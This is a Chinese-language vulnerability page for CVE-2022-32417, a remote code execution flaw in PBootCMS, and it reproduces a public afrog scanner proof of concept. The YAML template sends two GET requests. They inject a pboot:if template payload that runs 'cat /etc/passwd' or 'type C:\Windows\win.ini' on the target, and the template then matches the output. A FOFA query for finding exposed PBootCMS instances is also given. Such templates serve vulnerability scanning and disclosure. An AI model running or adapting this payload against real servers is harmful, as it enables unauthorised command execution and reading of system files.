CVE-2022-32417: PBootCMS RCE

日期: 2025-09-01 | 影响软件: PBootCMS | POC: 已公开

漏洞描述

FOFA: app="PBOOTCMS"

PoC代码[已公开]

id: CVE-2022-32417

info:
  name: PBootCMS RCE
  author: xpoc,Aurora
  severity: critical
  verified: true
  description: |
    FOFA: app="PBOOTCMS"
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32417
  tags: pbootcms,rce
  created: 2023/06/22

rules:
  r0:
    request:
      method: GET
      path: /index.php?keyword=}{pboot:if(get_lg/*&*/()/*&*/(get_backurl/*&*/()))}data{/pboot:if}&backurl=;{{cat%20/etc/passwd}}
      headers:
        Cookie: lg=system
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
  r1:
    request:
      method: GET
      path: /index.php?keyword=}{pboot:if(get_lg/*&*/()/*&*/(get_backurl/*&*/()))}data{/pboot:if}&backurl=;{{type%20C:\\Windows\\win.ini}}
      headers:
        Cookie: lg=system
    expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
expression: r0() || r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-32417.yaml

相关漏洞推荐